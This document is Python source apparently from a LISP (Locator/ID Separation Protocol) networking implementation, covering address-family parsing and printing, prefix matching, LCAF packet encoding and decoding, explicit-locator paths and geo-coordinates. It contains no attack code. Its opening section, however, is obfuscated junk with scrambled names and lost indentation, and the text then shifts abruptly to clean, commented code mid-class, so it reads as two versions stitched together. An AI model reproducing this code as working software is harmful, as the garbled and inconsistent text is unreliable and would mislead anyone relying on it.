if 55 - 55: II111iiii % O0 * O0 - II111iiii * I1IiiI % Oo0Ooo
if 48 - 48: I1ii11iIi11i + OoooooooOO % i1IIi
if ( oOOOo0o [ 0 ] <= 0xffff and ( oOOOo0o [ 0 ] & 0xff ) == 0 ) :
i1iiI11 = ( oOOOo0o [ 0 ] << 48 ) << 64
else :
i1iiI11 = byte_swap_64 ( oOOOo0o [ 0 ] ) << 64
if 13 - 13: Oo0Ooo + iII111i * OoooooooOO % i11iIiiIii * II111iiii . OoooooooOO
I1iO00O = byte_swap_64 ( oOOOo0o [ 1 ] )
self . address = i1iiI11 | I1iO00O
if 9 - 9: oO0o - O0 . iIii1I11I1II1 . ooOoO0o
elif ( self . is_mac ( ) ) :
I1Oo0O = oOOOo0o [ 0 ]
i1i1I111iiIi1 = oOOOo0o [ 1 ]
ooo00OOOoOO = oOOOo0o [ 2 ]
self . address = ( I1Oo0O << 32 ) + ( i1i1I111iiIi1 << 16 ) + ooo00OOOoOO
if 22 - 22: OoOoOO00 / o0oOOo0O0Ooo % I1Ii111 % i11iIiiIii % I1IiiI
elif ( self . is_e164 ( ) ) :
self . address = ( oOOOo0o [ 0 ] << 32 ) + oOOOo0o [ 1 ]
if 22 - 22: o0oOOo0O0Ooo - I1Ii111
elif ( self . is_dist_name ( ) ) :
packet , self . address = lisp_decode_dist_name ( packet )
self . mask_len = len ( self . address ) * 8
oOoOo000Ooooo = 0
if 50 - 50: I11i - OoOoOO00 + I1IiiI % Oo0Ooo / OoooooooOO - I1ii11iIi11i
packet = packet [ oOoOo000Ooooo : : ]
return ( packet )
if 26 - 26: IiII . Ii1I
if 35 - 35: I1ii11iIi11i + OOooOOo
def is_ipv4 ( self ) :
return ( True if ( self . afi == LISP_AFI_IPV4 ) else False )
if 88 - 88: O0
if 4 - 4: OoOoOO00 % iIii1I11I1II1 % OoooooooOO . oO0o
def is_ipv4_link_local ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( ( ( self . address >> 16 ) & 0xffff ) == 0xa9fe )
if 27 - 27: II111iiii - OoOoOO00
if 81 - 81: o0oOOo0O0Ooo - Oo0Ooo % IiII - ooOoO0o / O0
def is_ipv4_loopback ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( self . address == 0x7f000001 )
if 27 - 27: Oo0Ooo
if 15 - 15: iIii1I11I1II1 . OoOoOO00 % Ii1I / i1IIi . o0oOOo0O0Ooo
def is_ipv4_multicast ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( ( ( self . address >> 24 ) & 0xf0 ) == 0xe0 )
if 45 - 45: iIii1I11I1II1 - i1IIi % I1IiiI - I1Ii111 + oO0o
if 15 - 15: iIii1I11I1II1 - OoooooooOO / ooOoO0o
def is_ipv4_string ( self , addr_str ) :
return ( addr_str . find ( "." ) != - 1 )
if 83 - 83: IiII + I1Ii111 / OoOoOO00 * IiII . oO0o
if 22 - 22: O0 + ooOoO0o + I1Ii111
def is_ipv6 ( self ) :
return ( True if ( self . afi == LISP_AFI_IPV6 ) else False )
if 57 - 57: OOooOOo . ooOoO0o - OoooooooOO - I1ii11iIi11i * O0
    def is_ipv6_link_local(self):
        if (self.is_ipv6() == False): return(False)
        return(((self.address >> 112) & 0xffff) == 0xfe80)

    def is_ipv6_string_link_local(self, addr_str):
        return(addr_str.find("fe80::") != -1)

    def is_ipv6_loopback(self):
        if (self.is_ipv6() == False): return(False)
        return(self.address == 1)

    def is_ipv6_multicast(self):
        if (self.is_ipv6() == False): return(False)
        return(((self.address >> 120) & 0xff) == 0xff)

    def is_ipv6_string(self, addr_str):
        return(addr_str.find(":") != -1)

    def is_mac(self):
        return(True if (self.afi == LISP_AFI_MAC) else False)

    def is_mac_multicast(self):
        if (self.is_mac() == False): return(False)
        return((self.address & 0x010000000000) != 0)

    def is_mac_broadcast(self):
        if (self.is_mac() == False): return(False)
        return(self.address == 0xffffffffffff)

    def is_mac_string(self, addr_str):
        return(len(addr_str) == 15 and addr_str.find("-") != -1)

    def is_link_local_multicast(self):
        if (self.is_ipv4()):
            return((0xe0ffff00 & self.address) == 0xe0000000)

        if (self.is_ipv6()):
            return(((self.address >> 112) & 0xffff) == 0xff02)

        return(False)

    def is_null(self):
        return(True if (self.afi == LISP_AFI_NONE) else False)

    def is_ultimate_root(self):
        return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)

    def is_iid_range(self):
        return(True if self.afi == LISP_AFI_IID_RANGE else False)

    def is_e164(self):
        return(True if (self.afi == LISP_AFI_E164) else False)

    def is_dist_name(self):
        return(True if (self.afi == LISP_AFI_NAME) else False)

    def is_geo_prefix(self):
        return(True if (self.afi == LISP_AFI_GEO_COORD) else False)

    def is_binary(self):
        if (self.is_dist_name()): return(False)
        if (self.is_geo_prefix()): return(False)
        return(True)

    def store_address(self, addr_str):
        if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)

        #
        # Parse an instance-id written as "[<iid>]<address>".
        #
        left = addr_str.find("[")
        right = addr_str.find("]")
        if (left != -1 and right != -1):
            self.instance_id = int(addr_str[left+1:right])
            addr_str = addr_str[right+1::]
            if (self.is_dist_name() == False):
                addr_str = addr_str.replace(" ", "")

        #
        # Parse the rest of the string according to the address-family.
        #
        if (self.is_ipv4()):
            octets = addr_str.split(".")
            value = int(octets[0]) << 24
            value += int(octets[1]) << 16
            value += int(octets[2]) << 8
            value += int(octets[3])
            self.address = value
        elif (self.is_ipv6()):
            #
            # Detect an address whose 3rd and 4th characters are "::";
            # the hexlified inet_pton() output for such strings has its
            # first two byte-pairs swapped, so swap them back below.
            #
            swap_bytes = (addr_str[2:4] == "::")
            try:
                addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
            except:
                addr_str = socket.inet_pton(socket.AF_INET6, "0::0")

            addr_str = binascii.hexlify(addr_str)

            if (swap_bytes):
                addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]

            self.address = int(addr_str, 16)
        elif (self.is_geo_prefix()):
            geo = lisp_geo(None)
            geo.name = "geo-prefix-{}".format(geo)
            geo.parse_geo_string(addr_str)
            self.address = geo
        elif (self.is_mac()):
            addr_str = addr_str.replace("-", "")
            self.address = int(addr_str, 16)
        elif (self.is_e164()):
            addr_str = addr_str[1::]
            self.address = int(addr_str, 16) << 4
        elif (self.is_dist_name()):
            self.address = addr_str.replace("'", "")

        self.mask_len = self.host_mask_len()

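    #
    # Usage sketch for store_address() (hypothetical values; elsewhere in
    # this file lisp_address instances are constructed as
    # lisp_address(afi, addr_str, mask_len, iid)):
    #
    #   eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
    #   eid.store_address("[1000]10.1.1.1")
    #   eid.instance_id        # -> 1000
    #   eid.print_address()    # -> "[1000]10.1.1.1"
    #
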
    def store_prefix(self, prefix_str):
        if (self.is_geo_string(prefix_str)):
            index = prefix_str.find("]")
            mask_len = len(prefix_str[index+1::]) * 8
        elif (prefix_str.find("/") != -1):
            prefix_str, mask_len = prefix_str.split("/")
        else:
            left = prefix_str.find("'")
            if (left == -1): return
            right = prefix_str.find("'", left+1)
            if (right == -1): return
            mask_len = len(prefix_str[left+1:right]) * 8

        self.string_to_afi(prefix_str)
        self.store_address(prefix_str)
        self.mask_len = int(mask_len)

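    #
    # Usage sketch for store_prefix() (hypothetical values): a "/" suffix
    # sets mask_len explicitly, while a quoted distinguished-name derives
    # mask_len from the string length in bits:
    #
    #   prefix = lisp_address(LISP_AFI_NONE, "", 0, 0)
    #   prefix.store_prefix("[1000]10.0.0.0/8")    # mask_len -> 8
    #   prefix.store_prefix("'web-server'")        # mask_len -> 80
    #
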
    def zero_host_bits(self):
        if (self.mask_len < 0): return
        mask = (2 ** self.mask_len) - 1
        shift = self.addr_length() * 8 - self.mask_len
        mask <<= shift
        self.address &= mask

    def is_geo_string(self, addr_str):
        index = addr_str.find("]")
        if (index != -1): addr_str = addr_str[index+1::]

        geo_str = addr_str.split("/")
        if (len(geo_str) == 2):
            if (geo_str[1].isdigit() == False): return(False)

        #
        # A geo string is "lat-mins-secs-N/S-long-mins-secs-W/E" with an
        # optional 9th altitude element and an optional "/radius" suffix.
        #
        geo_str = geo_str[0]
        geo_str = geo_str.split("-")
        elements = len(geo_str)
        if (elements < 8 or elements > 9): return(False)

        for i in range(0, elements):
            if (i == 3):
                if (geo_str[i] in ["N", "S"]): continue
                return(False)

            if (i == 7):
                if (geo_str[i] in ["W", "E"]): continue
                return(False)

            if (geo_str[i].isdigit() == False): return(False)

        return(True)

    def string_to_afi(self, addr_str):
        if (addr_str.count("'") == 2):
            self.afi = LISP_AFI_NAME
            return

        if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
        elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
        elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
        elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
        elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
        else: self.afi = LISP_AFI_NONE

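    #
    # AFI inference examples for string_to_afi() (illustrative only):
    # "1:2::3" -> IPv6, "10.0.0.1" -> IPv4, "+14085551212" -> E.164,
    # "1-2-3-N-4-5-6-W" -> geo-coord, "0000-1111-2222" -> MAC, and any
    # string wrapped in two single-quotes -> distinguished-name.
    #
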
    def print_address(self):
        addr_str = self.print_address_no_iid()
        iid_str = "[" + str(self.instance_id)
        for iid in self.iid_list: iid_str += "," + str(iid)
        iid_str += "]"
        addr_str = "{}{}".format(iid_str, addr_str)
        return(addr_str)

    def print_address_no_iid(self):
        if (self.is_ipv4()):
            value = self.address
            byte1 = value >> 24
            byte2 = (value >> 16) & 0xff
            byte3 = (value >> 8) & 0xff
            byte4 = value & 0xff
            return("{}.{}.{}.{}".format(byte1, byte2, byte3, byte4))
        elif (self.is_ipv6()):
            addr_str = lisp_hex_string(self.address).zfill(32)
            addr_str = binascii.unhexlify(addr_str)
            addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
            return("{}".format(addr_str))
        elif (self.is_geo_prefix()):
            return("{}".format(self.address.print_geo()))
        elif (self.is_mac()):
            addr_str = lisp_hex_string(self.address).zfill(12)
            addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
                addr_str[8:12])
            return("{}".format(addr_str))
        elif (self.is_e164()):
            addr_str = lisp_hex_string(self.address).zfill(15)
            return("+{}".format(addr_str))
        elif (self.is_dist_name()):
            return("'{}'".format(self.address))

        return("unknown-afi:{}".format(self.afi))

    def print_prefix(self):
        if (self.is_ultimate_root()): return("[*]")
        if (self.is_iid_range()):
            if (self.mask_len == 32): return("[{}]".format(self.instance_id))
            end_iid = self.instance_id + (2 ** (32 - self.mask_len) - 1)
            return("[{}-{}]".format(self.instance_id, end_iid))

        addr_str = self.print_address()
        if (self.is_dist_name()): return(addr_str)
        if (self.is_geo_prefix()): return(addr_str)

        index = addr_str.find("no-address")
        if (index == -1):
            addr_str = "{}/{}".format(addr_str, str(self.mask_len))
        else:
            addr_str = addr_str[0:index]

        return(addr_str)

    def print_prefix_no_iid(self):
        addr_str = self.print_address_no_iid()
        if (self.is_dist_name()): return(addr_str)
        if (self.is_geo_prefix()): return(addr_str)
        return("{}/{}".format(addr_str, str(self.mask_len)))

    def print_prefix_url(self):
        if (self.is_ultimate_root()): return("0--0")
        addr_str = self.print_address()
        index = addr_str.find("]")
        if (index != -1): addr_str = addr_str[index+1::]
        if (self.is_geo_prefix()):
            addr_str = addr_str.replace("/", "-")
            return("{}-{}".format(self.instance_id, addr_str))

        return("{}-{}-{}".format(self.instance_id, addr_str, self.mask_len))

    def print_sg(self, g):
        source_str = self.print_prefix()
        si = source_str.find("]") + 1
        group_str = g.print_prefix()
        gi = group_str.find("]") + 1
        sg_str = "[{}]({}, {})".format(self.instance_id, source_str[si::],
            group_str[gi::])
        return(sg_str)

    def hash_address(self, addr):
        addr1 = self.address
        addr2 = addr.address

        if (self.is_geo_prefix()): addr1 = self.address.print_geo()
        if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()

        #
        # String addresses (dist-names, geo-prefixes) hash on the first
        # character; encode to bytes so hexlify works under Python 3.
        #
        if (type(addr1) == str):
            addr1 = int(binascii.hexlify(addr1[0:1].encode()))

        if (type(addr2) == str):
            addr2 = int(binascii.hexlify(addr2[0:1].encode()))

        return(addr1 ^ addr2)

    def is_more_specific(self, prefix):
        if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)

        mask_len = prefix.mask_len
        if (prefix.afi == LISP_AFI_IID_RANGE):
            size = 2 ** (32 - mask_len)
            start_iid = prefix.instance_id
            end_iid = start_iid + size
            return(self.instance_id in range(start_iid, end_iid))

        if (self.instance_id != prefix.instance_id): return(False)
        if (self.afi != prefix.afi):
            if (prefix.afi != LISP_AFI_NONE): return(False)

        #
        # Non-binary EIDs (distinguished-names and geo-prefixes) compare
        # as strings; a longer string that begins with the prefix string
        # is more specific.
        #
        if (self.is_binary() == False):
            if (prefix.afi == LISP_AFI_NONE): return(True)
            if (type(self.address) != type(prefix.address)): return(False)
            addr_str = self.address
            prefix_str = prefix.address
            if (self.is_geo_prefix()):
                addr_str = self.address.print_geo()
                prefix_str = prefix.address.print_geo()

            if (len(addr_str) < len(prefix_str)): return(False)
            return(addr_str.find(prefix_str) == 0)

        #
        # Binary EIDs compare under the prefix mask; this address is more
        # specific when its mask is at least as long and its masked bits
        # equal the prefix address.
        #
        if (self.mask_len < mask_len): return(False)

        shift = (prefix.addr_length() * 8) - mask_len
        mask = (2 ** mask_len - 1) << shift
        return((self.address & mask) == prefix.address)

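    #
    # Worked example for is_more_specific() (hypothetical values): with
    # self = [1000]10.1.1.0/24 and prefix = [1000]10.0.0.0/8, the mask is
    # 0xff000000 and 10.1.1.0 & 0xff000000 == 10.0.0.0, so the method
    # returns True; it returns False for prefix [2000]10.0.0.0/8 because
    # the instance-ids differ.
    #
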
    def mask_address(self, mask_len):
        shift = (self.addr_length() * 8) - mask_len
        mask = (2 ** mask_len - 1) << shift
        self.address &= mask

    def is_exact_match(self, prefix):
        if (self.instance_id != prefix.instance_id): return(False)
        p1 = self.print_prefix()
        p2 = prefix.print_prefix() if prefix else ""
        return(p1 == p2)

    def is_local(self):
        if (self.is_ipv4()):
            local = lisp_myrlocs[0]
            if (local == None): return(False)
            local = local.print_address_no_iid()
            return(self.print_address_no_iid() == local)

        if (self.is_ipv6()):
            local = lisp_myrlocs[1]
            if (local == None): return(False)
            local = local.print_address_no_iid()
            return(self.print_address_no_iid() == local)

        return(False)

    def store_iid_range(self, iid, mask_len):
        if (self.afi == LISP_AFI_NONE):
            if (iid == 0 and mask_len == 0): self.afi = LISP_AFI_ULTIMATE_ROOT
            else: self.afi = LISP_AFI_IID_RANGE

        self.instance_id = iid
        self.mask_len = mask_len

    def lcaf_length(self, lcaf_type):
        length = self.addr_length() + 2

        #
        # Add per-LCAF-type fixed overhead to the encoded address length.
        #
        if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
        if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
        if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
        if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
        if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
        if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
        if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
        return(length)

    def lcaf_encode_iid(self):
        lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
        lcaf_len = socket.htons(self.lcaf_length(lcaf_type))
        iid = self.instance_id
        afi = self.afi
        mask_len = 0
        if (afi < 0):
            if (self.afi == LISP_AFI_GEO_COORD):
                afi = LISP_AFI_LCAF
                mask_len = 0
            else:
                afi = 0
                mask_len = self.mask_len

        packet = struct.pack("BBBBH", 0, 0, lcaf_type, mask_len, lcaf_len)
        packet += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
        if (afi == 0): return(packet)

        if (self.afi == LISP_AFI_GEO_COORD):
            packet = packet[0:-2]
            packet += self.address.encode_geo()
            return(packet)

        packet += self.pack_address()
        return(packet)

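    #
    # Wire layout produced by lcaf_encode_iid(), following the LCAF
    # Instance-ID type (type 2 in RFC 8060); the address is omitted when
    # the encoded AFI is 0:
    #
    #   struct.pack("BBBBH", rsvd, rsvd, type, iid-mask-len, length)
    #   struct.pack("IH", instance-id, afi)
    #   [AFI-encoded address, or a nested geo-coord LCAF]
    #
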
    def lcaf_decode_iid(self, packet):
        packet_format = "BBBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        rsvd1, rsvd2, lcaf_type, iid_ml, length = struct.unpack(
            packet_format, packet[:format_size])
        packet = packet[format_size::]

        if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)

        packet_format = "IH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        iid, afi = struct.unpack(packet_format, packet[:format_size])
        packet = packet[format_size::]

        length = socket.ntohs(length)
        self.instance_id = socket.ntohl(iid)
        afi = socket.ntohs(afi)
        self.afi = afi
        if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
        if (afi == 0):
            self.afi = LISP_AFI_IID_RANGE if iid_ml else \
                LISP_AFI_ULTIMATE_ROOT

        #
        # An AFI of 0 means no address follows the instance-id.
        #
        if (afi == 0): return(packet)

        #
        # Distinguished-name addresses are variable length.
        #
        if (self.is_dist_name()):
            packet, self.address = lisp_decode_dist_name(packet)
            self.mask_len = len(self.address) * 8
            return(packet)

        #
        # A nested LCAF here carries a geo-coordinate address.
        #
        if (afi == LISP_AFI_LCAF):
            packet_format = "BBBBH"
            format_size = struct.calcsize(packet_format)
            if (len(packet) < format_size): return(None)

            rsvd1, flags, lcaf_type, radius_hi, lcaf_len = struct.unpack(
                packet_format, packet[:format_size])

            if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)

            lcaf_len = socket.ntohs(lcaf_len)
            packet = packet[format_size::]
            if (lcaf_len > len(packet)): return(None)

            geo = lisp_geo("")
            self.afi = LISP_AFI_GEO_COORD
            self.address = geo
            packet = geo.decode_geo(packet, lcaf_len, radius_hi)
            self.mask_len = self.host_mask_len()
            return(packet)

        length = self.addr_length()
        if (len(packet) < length): return(None)

        packet = self.unpack_address(packet)
        return(packet)

    def lcaf_encode_sg(self, group):
        lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
        iid = socket.htonl(self.instance_id)
        lcaf_len = socket.htons(self.lcaf_length(lcaf_type))
        packet = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, lcaf_len, iid,
            0, self.mask_len, group.mask_len)

        packet += struct.pack("H", socket.htons(self.afi))
        packet += self.pack_address()
        packet += struct.pack("H", socket.htons(group.afi))
        packet += group.pack_address()
        return(packet)

    def lcaf_decode_sg(self, packet):
        packet_format = "BBBBHIHBB"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])

        rsvd1, rsvd2, lcaf_type, rsvd3, lcaf_len, iid, rsvd4, source_ml, \
            group_ml = struct.unpack(packet_format, packet[:format_size])

        packet = packet[format_size::]

        if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])

        self.instance_id = socket.ntohl(iid)
        lcaf_len = socket.ntohs(lcaf_len) - 8

        #
        # Decode the source EID, an AFI followed by an address.
        #
        packet_format = "H"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])
        if (lcaf_len < format_size): return([None, None])

        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        lcaf_len -= format_size
        self.afi = socket.ntohs(afi)
        self.mask_len = source_ml
        length = self.addr_length()
        if (lcaf_len < length): return([None, None])

        packet = self.unpack_address(packet)
        if (packet == None): return([None, None])

        lcaf_len -= length

        #
        # Decode the group address, an AFI followed by an address.
        #
        packet_format = "H"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])
        if (lcaf_len < format_size): return([None, None])

        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        lcaf_len -= format_size
        group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        group.afi = socket.ntohs(afi)
        group.mask_len = group_ml
        group.instance_id = self.instance_id
        length = self.addr_length()
        if (lcaf_len < length): return([None, None])

        packet = group.unpack_address(packet)
        if (packet == None): return([None, None])

        return([packet, group])

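    #
    # The Multicast-Info LCAF decoded above carries (S,G) as two
    # AFI-prefixed addresses after the common header, which is why
    # lcaf_decode_sg() stores the source in self and returns the
    # remaining packet together with a separate group lisp_address.
    #
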
    def lcaf_decode_eid(self, packet):
        packet_format = "BBB"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])

        #
        # Peek at the LCAF type to decide which decoder to call.
        #
        rsvd, flags, lcaf_type = struct.unpack(packet_format,
            packet[:format_size])

        if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
            return([self.lcaf_decode_iid(packet), None])
        elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
            packet, group = self.lcaf_decode_sg(packet)
            return([packet, group])
        elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
            packet_format = "BBBBH"
            format_size = struct.calcsize(packet_format)
            if (len(packet) < format_size): return(None)

            rsvd1, flags, lcaf_type, radius_hi, lcaf_len = struct.unpack(
                packet_format, packet[:format_size])

            if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)

            lcaf_len = socket.ntohs(lcaf_len)
            packet = packet[format_size::]
            if (lcaf_len > len(packet)): return(None)

            geo = lisp_geo("")
            self.instance_id = 0
            self.afi = LISP_AFI_GEO_COORD
            self.address = geo
            packet = geo.decode_geo(packet, lcaf_len, radius_hi)
            self.mask_len = self.host_mask_len()

        return([packet, None])

class lisp_elp_node(object):
    def __init__(self):
        self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.probe = False
        self.strict = False
        self.eid = False
        self.we_are_last = False

    def copy_elp_node(self):
        elp_node = lisp_elp_node()

        #
        # Copy through the embedded lisp_address; lisp_elp_node itself
        # has no copy_address() method (the original called it on the
        # node, matching copy_rle_node() below instead).
        #
        elp_node.address.copy_address(self.address)
        elp_node.probe = self.probe
        elp_node.strict = self.strict
        elp_node.eid = self.eid
        elp_node.we_are_last = self.we_are_last
        return(elp_node)

class lisp_elp(object):
    def __init__(self, name):
        self.elp_name = name
        self.elp_nodes = []
        self.use_elp_node = None
        self.we_are_last = False

    def copy_elp(self):
        elp = lisp_elp(self.elp_name)
        elp.use_elp_node = self.use_elp_node
        elp.we_are_last = self.we_are_last
        for elp_node in self.elp_nodes:
            elp.elp_nodes.append(elp_node.copy_elp_node())

        return(elp)

    def print_elp(self, want_marker):
        elp_str = ""
        for elp_node in self.elp_nodes:
            marker = ""
            if (want_marker):
                if (elp_node == self.use_elp_node):
                    marker = "*"
                elif (elp_node.we_are_last):
                    marker = "x"

            elp_str += "{}{}({}{}{}), ".format(marker,
                elp_node.address.print_address_no_iid(),
                "r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
                "S" if elp_node.strict else "s")

        return(elp_str[0:-2] if elp_str != "" else "")

    def select_elp_node(self):
        ipv4, ipv6, device = lisp_myrlocs
        index = None

        for elp_node in self.elp_nodes:
            if (ipv4 and elp_node.address.is_exact_match(ipv4)):
                index = self.elp_nodes.index(elp_node)
                break

            if (ipv6 and elp_node.address.is_exact_match(ipv6)):
                index = self.elp_nodes.index(elp_node)
                break

        #
        # None of our RLOCs appear in the ELP, so encapsulate to the
        # first hop of the path.
        #
        if (index == None):
            self.use_elp_node = self.elp_nodes[0]
            elp_node.we_are_last = False
            return

        #
        # Our RLOC is the last hop of the ELP; there is no next node to
        # encapsulate to.
        #
        if (self.elp_nodes[-1] == self.elp_nodes[index]):
            self.use_elp_node = None
            elp_node.we_are_last = True
            return

        #
        # Otherwise, encapsulate to the node that follows our RLOC in
        # the path.
        #
        self.use_elp_node = self.elp_nodes[index + 1]
        return

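#
# Example of the traversal implemented by select_elp_node() (hypothetical
# RLOCs): for an explicit-locator-path a -> b -> c, a system whose RLOCs
# match none of the hops encapsulates to a; a system owning b
# encapsulates to c; a system owning c is the last hop and sets
# we_are_last instead of choosing a next node.
#
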
class lisp_geo(object):
    def __init__(self, name):
        self.geo_name = name
        self.latitude = 0xffffffff     # 0xffffffff means unset.
        self.lat_mins = 0
        self.lat_secs = 0
        self.longitude = 0xffffffff    # 0xffffffff means unset.
        self.long_mins = 0
        self.long_secs = 0
        self.altitude = -1
        self.radius = 0

    def copy_geo(self):
        geo = lisp_geo(self.geo_name)
        geo.latitude = self.latitude
        geo.lat_mins = self.lat_mins
        geo.lat_secs = self.lat_secs
        geo.longitude = self.longitude
        geo.long_mins = self.long_mins
        geo.long_secs = self.long_secs
        geo.altitude = self.altitude
        geo.radius = self.radius
        return(geo)

    def no_geo_altitude(self):
        return(self.altitude == -1)

    def parse_geo_string(self, geo_str):
        index = geo_str.find("]")
        if (index != -1): geo_str = geo_str[index+1::]

        #
        # An optional "/<radius-in-km>" suffix makes this a geo-prefix.
        #
        if (geo_str.find("/") != -1):
            geo_str, radius = geo_str.split("/")
            self.radius = int(radius)

        geo_str = geo_str.split("-")
        if (len(geo_str) < 8): return(False)

        latitude = geo_str[0:4]
        longitude = geo_str[4:8]

        #
        # An optional 9th element is the altitude.
        #
        if (len(geo_str) > 8): self.altitude = int(geo_str[8])

        #
        # Latitude is "degrees-mins-secs-N/S"; north stored negative.
        #
        self.latitude = int(latitude[0])
        self.lat_mins = int(latitude[1])
        self.lat_secs = int(latitude[2])
        if (latitude[3] == "N"): self.latitude = -self.latitude

        #
        # Longitude is "degrees-mins-secs-W/E"; east stored negative.
        #
        self.longitude = int(longitude[0])
        self.long_mins = int(longitude[1])
        self.long_secs = int(longitude[2])
        if (longitude[3] == "E"): self.longitude = -self.longitude
        return(True)

    def print_geo(self):
        lat_dir = "N" if self.latitude < 0 else "S"
        long_dir = "E" if self.longitude < 0 else "W"

        geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
            self.lat_mins, self.lat_secs, lat_dir, abs(self.longitude),
            self.long_mins, self.long_secs, long_dir)

        if (self.no_geo_altitude() == False):
            geo_str += "-" + str(self.altitude)

        #
        # Append "/<radius>" when this is a geo-prefix.
        #
        if (self.radius != 0): geo_str += "/{}".format(self.radius)
        return(geo_str)

    def geo_url(self):
        #
        # Guard against an unset environment variable; os.getenv()
        # returns None in that case, which the original compared only
        # against "".
        #
        zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
        zoom = "10" if (zoom == None or zoom == "" or
            zoom.isdigit() == False) else zoom
        lat, lon = self.dms_to_decimal()
        url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
            "&markers=color:blue%7Clabel:lisp%7C{},{}" + \
            "&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat,
            lon, zoom)
        return(url)

    def print_geo_url(self):
        geo_str = self.print_geo()
        if (self.radius == 0):
            url = self.geo_url()
            html_str = "<a href='{}'>{}</a>".format(url, geo_str)
        else:
            url = geo_str.replace("/", "-")
            html_str = "<a href='/lisp/geo-map/{}'>{}</a>".format(url,
                geo_str)

        return(html_str)

    def dms_to_decimal(self):
        degrees, mins, secs = self.latitude, self.lat_mins, self.lat_secs
        dd = float(abs(degrees))
        dd += float(mins * 60 + secs) / 3600
        if (degrees > 0): dd = -dd
        dd_lat = dd

        degrees, mins, secs = self.longitude, self.long_mins, self.long_secs
        dd = float(abs(degrees))
        dd += float(mins * 60 + secs) / 3600
        if (degrees > 0): dd = -dd
        dd_long = dd
        return((dd_lat, dd_long))

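    #
    # Worked example for dms_to_decimal() (hypothetical coordinate):
    # "37-23-30-N" parses to latitude = -37 (north is stored negative)
    # and converts as 37 + (23*60 + 30)/3600 = 37.3917 decimal degrees;
    # the final sign flip makes north positive and south negative, the
    # convention geopy expects.
    #
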
    def get_distance(self, geo_point):
        dd_prefix = self.dms_to_decimal()
        dd_point = geo_point.dms_to_decimal()
        distance = geopy.distance.distance(dd_prefix, dd_point)
        return(distance.km)

    def point_in_circle(self, geo_point):
        km = self.get_distance(geo_point)
        return(km <= self.radius)

    def encode_geo(self):
        lcaf_afi = socket.htons(LISP_AFI_LCAF)
        lcaf_len = socket.htons(20 + 2)
        flags = 0

        lat = abs(self.latitude)
        lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
        if (self.latitude < 0): flags |= 0x40    # Set for north latitude.

        lon = abs(self.longitude)
        lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
        if (self.longitude < 0): flags |= 0x20   # Set for east longitude.

        alt = 0
        if (self.no_geo_altitude() == False):
            alt = socket.htonl(self.altitude)
            flags |= 0x10                        # Altitude is present.

        radius = socket.htons(self.radius)
        if (radius != 0): flags |= 0x06          # Radius present, in km.

        packet = struct.pack("HBBBBH", lcaf_afi, 0, 0,
            LISP_LCAF_GEO_COORD_TYPE, 0, lcaf_len)
        packet += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat,
            lat_ms >> 16, socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
            socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)

        return(packet)

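    #
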